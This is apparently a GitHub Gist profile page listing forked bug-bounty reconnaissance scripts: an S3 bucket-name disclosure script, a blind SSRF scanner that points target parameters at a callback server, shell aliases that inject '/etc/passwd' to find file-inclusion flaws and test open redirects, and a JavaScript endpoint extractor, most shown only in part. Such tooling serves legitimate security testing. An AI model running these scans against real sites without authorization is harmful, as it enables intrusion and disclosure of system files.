aly_Inj3ctor AlishahMughal123

🎯

NooB On Its Way

Focus ☮️

11 followers · 45 following

Mountains
@AlishahMughal12

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

AlishahMughal123 / bucket-disclose.sh

Created October 12, 2020 09:46 — forked from fransr/bucket-disclose.sh

Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages

	#!/bin/bash

	# Written by Frans Rosén (twitter.com/fransrosen)
	_debug="$2" #turn on debug
	_timeout="20"
	#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
	_aws_key="AKIA..."
	H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
	H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

AlishahMughal123 / ssrf.sh

Created September 23, 2020 15:14 — forked from hussein98d/ssrf.sh

This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.

	echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
	echo "Usage: bash script.sh domain.com http://server-callbak"
	echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
	if [ -z "$1" ]; then
	echo >&2 "ERROR: Domain not set"
	exit 2
	fi
	if [ -z "$2" ]; then
	echo >&2 "ERROR: Sever link not set"
	exit 2

AlishahMughal123 / bash_aliases.sh

Created September 20, 2020 12:18 — forked from dwisiswant0/bash_aliases.sh

One-liner to get Open-redirect & LFI

	lfi() {
	gau $1 \| gf lfi \| qsreplace "/etc/passwd" \| xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 \| grep -q "root:x" && echo "VULN! %"'
	}

	open-redirect() {
	local LHOST="http://localhost"; gau $1 \| gf redirect \| qsreplace "$LHOST" \| xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 \| grep -q "Location: $LHOST" && echo "VULN! %"'
	}

AlishahMughal123 / ejs.sh

Created September 20, 2020 12:08 — forked from gwen001/ejs.sh

onliner to extract endpoints from JS files of a given host

	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# using linkfinder
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]*" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" \| xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
	}

	# with file download (the new best one):
	# but there is a bug if you don't provide a root url